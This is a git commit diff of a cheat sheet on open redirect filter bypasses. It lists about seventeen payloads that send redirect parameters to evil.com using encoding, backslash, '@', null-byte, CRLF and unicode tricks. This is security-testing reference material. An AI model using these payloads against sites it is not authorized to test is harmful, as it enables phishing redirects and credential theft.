Adding a lot open redirect tips

This commit is contained in:
MD15 2021-04-29 04:41:34 +07:00
parent 5428e25125
commit db67aa4646

View File

@ -1,66 +1,90 @@
## Filter Bypass
## Open Redirect
1. Using a whitelisted domain or keyword
1. Try change the domain
```
target.com.evil.com
/?redir=evil.com
```
2. Using "//" to bypass "http" blacklisted keyword
2. Using a whitelisted domain or keyword
```
//evil.com
/?redir=target.com.evil.com
```
3. Using "https:" to bypass "//" blacklisted keyword
3. Using `//` to bypass `http` blacklisted keyword
```
https:evil.com
/?redir=//evil.com
```
4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
4. Using `https:` to bypass `//` blacklisted keyword
```
\/\/evil.com/
/\/evil.com/
/?redir=https:evil.com
```
5. Using "%E3%80%82" to bypass "." blacklisted character
5. Using `\\` to bypass `//` blacklisted keyword
```
/?redir=\\evil.com
```
6. Using `\/\/` to bypass `//` blacklisted keyword
```
/?redir=\/\/evil.com/
/?redir=/\/evil.com/
```
7. Using `%E3%80%82` to bypass `.` blacklisted character
```
/?redir=evil。com
/?redir=evil%E3%80%82com
```
6. Using null byte "%00" to bypass blacklist filter
8. Using null byte `%00` to bypass blacklist filter
```
//evil%00.com
/?redir=//evil%00.com
```
7. Using parameter pollution
9. Using parameter pollution
```
?next=target.com&next=evil.com
/?next=target.com&next=evil.com
```
8. Using "@" character, browser will redirect to anything after the "@"
10. Using `@` or `%40` character, browser will redirect to anything after the `@`
```
target.com@evil.com
target.com%40evil.com
/?redir=target.com@evil.com
/?redir=target.com%40evil.com
```
9. Creating folder as their domain
11. Creating folder as their domain
```
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```
10. Using "?" characted, browser will translate it to "/?"
12. Using `?` characted, browser will translate it to `/?`
```
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com
/?redir=target.com?evil.com
```
11. Host/Split Unicode Normalization
13. Bypass the filter if it only checks for domain name using `%23`
```
/?redir=target.com%23evil.com
```
14. Host/Split Unicode Normalization
```
https://evil.c℀.example.com
```
12. Using parsing
15. Using parsing
```
http://ⓔⓥⓘⓛ.ⓒⓞⓜ
```
16. Using `°` symbol to bypass
```
/?redir=target.com/°evil.com
```
17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a`
```
/?redir=/%0d/evil.com
```